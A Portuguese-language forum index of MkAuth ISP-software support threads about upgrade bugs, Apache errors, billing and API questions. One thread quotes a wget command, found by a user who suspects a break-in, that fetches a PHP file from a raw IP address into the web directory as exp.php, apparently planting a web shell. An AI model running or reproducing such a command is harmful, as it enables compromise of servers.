Todas as discussões (36450)
Erro Apache2 após atualizar o MkAuth para versão 21.
Após atualizar para a versão 21 meu MKAuth não abre mais, verifiquei que o apache2 não está iniciando e está apresentando uma falha na linha 140 do apache2.conf (IncludeOptional mods-enabled/*.load), gostaria de ajuda para sanar está falha.
Saiba mais…Problemas apos atualizar para Versão 21.02
Bom dia hoje meu mkauth amanheceu sem a barra de menus, sera que vai ter update sem ate final do dia sem a velha lenga lenga de formatar e começar do zero
Por favor algum uma base de 500 cliestes para recuperar
Saiba mais…mkauth sendo hackeado ?
Bom dia!
não consigo ver os logs.
o uptime e outras variaveis não funcionam mais.
acho que fui hackeado.
quando abri o mkauth hoje consegui ver esse comando:
wget http://131.196.4.58/mkfiles/e.php -O ../mkfiles/exp.php
aparentemente foi alterado ess
Saiba mais…Problemas ao instalar mkauth
Boa tarde, estou tentando instalar mkauth numa maquina e na hora boto pra iniciar a instalação ele fica em loop, testei o mesmo pendrive em outras maquina e esta bom.
Alguem poderia me ajudar?
Placa mae Asus A68HM-E33 v2
4gb ram ddr3
amd A4-4000
Saiba mais…[resolvido] Software EMS para Olt V1600B1 que ja dissam ser a FD1104S CDATA
Estou a procura do software EMS para a Olt V1600B1
pelo menos é o que tem na etiqueta dela, porem em algumas pesquisas me diseram se tratar da FD1104S da CData.
mesmo assim, não consegui o software compatível com ela...
Se alguem tiver informações p
Saiba mais…COMO FAÇO PRA ENVIAR OS CARNÊS POR EMAIL AUTOMATICAMENTE ?
Aguardo retorno.
Grato.
Saiba mais…Pedro, nessa nova API, é possível fazer download do boleto em PDF?
Distribuir clientes em bloco de ips
Pessoal me tirem uma dúvida ou me indiquem algumas formas de fazer isso, sou novo no ramo de provedor, ate uns dias usava somente 1 ip dedicado, mas começou a dá problema com jogos online e blacklist, entao a recebi um bloco com 14 ips da operadora,
Saiba mais…Bug 21.02 :: K4.9 Sistema não altera em massa o Plano Bloqueado
O sistema não altera em massa o plano bloqueado, seleciono todos os clientes e todas as paginas ele me da a confirmação de que foi alterado mais na verdade não altera. Alguém sabe como resolver?
Saiba mais…SISTEMA NÃO MOSTRA A CONEXÃO DO CLIENTE
BOM DIA, DEPOIS DA ATUALIZAÇÃO O MKAUTH NÃO MOSTRA AS CONEXÕES DOS CLIENTES, CHAVE SSH FUNCIONA NORMAL E LIBERA O CLIENTE NORMALMENTE, MAS NÃO VEJO O TRÁFEGO E AS CONEXÕES.
Saiba mais…Clientes não conseguem imprimir boleto via central do assinante
Arquivo PDF inválido.
Saiba mais…VARIAVEIS DISPONIVEIS:
Boa tarde Pedro,
Teria como add nas variaveis disponiveis o "ESTADO CIVIL"?
Saiba mais…EQUIPE SUPORTE ME DA UM SOCORRO
login as: root
Debian GNU/Linux 8
root@35.247.75.102's password:
Linux mk-auth 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for
[resolvido] MK AUTH perdendo as configurações de IP
Pessoal boa tarde,
Estou tendo dificuldades com o MKAUTH.
01 - Fiz a instalação
02 - Fiz o Registro
03 - Fiz o Update
Após isso quando reinicia o MKAUTH ele perde as configurações de rede e com isso estou tendo problemas para que o mesmo seja integrad
acesso negado
as vezes ta aparecendo isso na pagina inicial do mk uma msg de acesso negado e todos os logs anteriores desaparece alguém pode ajudar
Disponibilidade de Layout template para Admin
Gostaria de melhorar o Admin do MKauth, aplicar um padrão melhor de Layout ajudaria usabilidade do sistema. Pedro se for possível disponibilizar os Html no sistema Daria para fazer essas modificações.
Saiba mais…API 22.02 Ativar plano
Olá, alguém tem a função para "Ativar um plano" (Instalação nova) via API ?
Saiba mais…Versão 21.03 k3.1 não envia email
Boa tarde pessoal estou com o seguinte problema, atualizei meu sistema para a versão 21.03 k3.1 e a partir dai o mkauth não envia mais email para os clientes, alguem ja passou por isso e conseguiu resolver, ja testei o sendmail diretamente pelo debia
Saiba mais…Atendimento automatizado 24hrs para provedores
Olá, amigos provedores
Espero que todos estejam bem!
Gostaria de comunicar que estamos com alguns valores diferenciados para contratação do Chatbot Mobo, o assistente virtual para fazer atendimentos 24hrs no seu provedor da CIANET. Ele já é integrad